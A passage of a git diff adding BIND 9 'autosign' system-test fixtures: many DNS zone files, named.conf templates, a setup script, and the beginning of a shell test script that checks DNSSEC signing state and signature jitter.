b/bin/tests/system/autosign/ns3/noksk.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/noksk.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/nozsk.example.db.in b/bin/tests/system/autosign/ns3/nozsk.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nozsk.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/nsec-only.example.db.in b/bin/tests/system/autosign/ns3/nsec-only.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nsec-only.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in b/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/nsec3.example.db.in b/bin/tests/system/autosign/ns3/nsec3.example.db.in new file mode 100644 index 0000000..17964e8 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nsec3.example.db.in @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +child NS ns2.example. +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17 diff --git a/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in b/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in b/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/oldsigs.example.db.in b/bin/tests/system/autosign/ns3/oldsigs.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/oldsigs.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/optout.example.db.in b/bin/tests/system/autosign/ns3/optout.example.db.in new file mode 100644 index 0000000..fbb05af --- /dev/null +++ b/bin/tests/system/autosign/ns3/optout.example.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +insecure NS ns.insecure +ns.insecure A 10.53.0.3 +secure NS ns.secure +ns.secure A 10.53.0.3 +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 +optout NS ns.optout +ns.optout A 10.53.0.3 +child NS ns2.example. +insecure.empty NS ns.insecure.empty +ns.insecure.empty A 10.53.0.3 diff --git a/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in b/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/optout.optout.example.db.in b/bin/tests/system/autosign/ns3/optout.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/optout.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/rsasha256.example.db.in b/bin/tests/system/autosign/ns3/rsasha256.example.db.in new file mode 100644 index 0000000..f6c4fab --- /dev/null +++ b/bin/tests/system/autosign/ns3/rsasha256.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/rsasha512.example.db.in b/bin/tests/system/autosign/ns3/rsasha512.example.db.in new file mode 100644 index 0000000..f6c4fab --- /dev/null +++ b/bin/tests/system/autosign/ns3/rsasha512.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in b/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in b/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/autosign/ns3/secure.example.db.in b/bin/tests/system/autosign/ns3/secure.example.db.in new file mode 100644 index 0000000..9855ec0 --- /dev/null +++ b/bin/tests/system/autosign/ns3/secure.example.db.in @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + +dname-and-txt DNAME @ + TXT "DNAME and TXT" diff --git a/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in b/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/secure.optout.example.db.in b/bin/tests/system/autosign/ns3/secure.optout.example.db.in new file mode 100644 index 0000000..15fe621 --- /dev/null +++ b/bin/tests/system/autosign/ns3/secure.optout.example.db.in @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + diff --git a/bin/tests/system/autosign/ns3/sync.example.db.in b/bin/tests/system/autosign/ns3/sync.example.db.in new file mode 100644 index 0000000..c6c7f88 --- /dev/null +++ b/bin/tests/system/autosign/ns3/sync.example.db.in @@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 diff --git a/bin/tests/system/autosign/ns3/ttl1.example.db.in b/bin/tests/system/autosign/ns3/ttl1.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/ttl1.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/ttl2.example.db.in b/bin/tests/system/autosign/ns3/ttl2.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/ttl2.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/ttl3.example.db.in b/bin/tests/system/autosign/ns3/ttl3.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/ttl3.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/ttl4.example.db.in b/bin/tests/system/autosign/ns3/ttl4.example.db.in new file mode 100644 index 0000000..0b11a00 --- /dev/null +++ b/bin/tests/system/autosign/ns3/ttl4.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2009102722 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns4/named.conf.in b/bin/tests/system/autosign/ns4/named.conf.in new file mode 100644 index 0000000..b46ce91 --- /dev/null +++ b/bin/tests/system/autosign/ns4/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + dnssec-must-be-secure mustbesecure.example yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; +include "private.conf"; diff --git a/bin/tests/system/autosign/ns5/named.conf.in b/bin/tests/system/autosign/ns5/named.conf.in new file mode 100644 index 0000000..710dfa8 --- /dev/null +++ b/bin/tests/system/autosign/ns5/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/autosign/setup.sh b/bin/tests/system/autosign/setup.sh new file mode 100644 index 0000000..82faf02 --- /dev/null +++ b/bin/tests/system/autosign/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +echo_i "generating keys and preparing zones" +cd ns1 && $SHELL keygen.sh diff --git a/bin/tests/system/autosign/tests.sh b/bin/tests/system/autosign/tests.sh new file mode 100755 index 0000000..ac96507 --- /dev/null +++ b/bin/tests/system/autosign/tests.sh @@ -0,0 +1,1788 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# convert private-type records to readable form +showprivate () { + echo "-- $@ --" + $DIG $DIGOPTS +nodnssec +short @$2 -t type65534 $1 | cut -f3 -d' ' | + while read record; do + $PERL -e 'my $rdata = pack("H*", @ARGV[0]); + die "invalid record" unless length($rdata) == 5; + my ($alg, $key, $remove, $complete) = unpack("CnCC", $rdata); + my $action = "signing"; + $action = "removing" if $remove; + my $state = " (incomplete)"; + $state = " (complete)" if $complete; + print ("$action: alg: $alg, key: $key$state\n");' $record + done +} + +# check that signing records are marked as complete +checkprivate () { + _ret=0 + expected="${3:-0}" + x=$(showprivate "$@") + echo $x | grep incomplete > /dev/null && _ret=1 + + if [ $_ret = $expected ]; then + return 0 + fi + + echo "$x" + echo_i "failed" + return 1 +} + +# wait until notifies for zone $1 are sent by server $2. This is an indication +# that the zone is signed with the active keys, and the changes have been +# committed. +wait_for_notifies () { + wait_for_log 10 "zone ${1}/IN: sending notifies" "${2}/named.run" || return 1 +} + +freq() { + _file=$1 + # remove first and last line that has incomplete set and skews the distribution + awk '$4 == "RRSIG" {print substr($9,1,8)}' < "$_file" | sort | uniq -c | sed '1d;$d' +} +# Check the signatures expiration times. First check how many signatures +# there are in total ($rrsigs). Then see what the distribution of signature +# expiration times is ($expiretimes). Ignore the time part for a better +# modelled distribution. +checkjitter () { + _file=$1 + _ret=0 + + if ! command -v bc >/dev/null 2>&1; then + echo_i "skip: bc not available" + return 0 + fi + + freq "$_file" | cat_i + 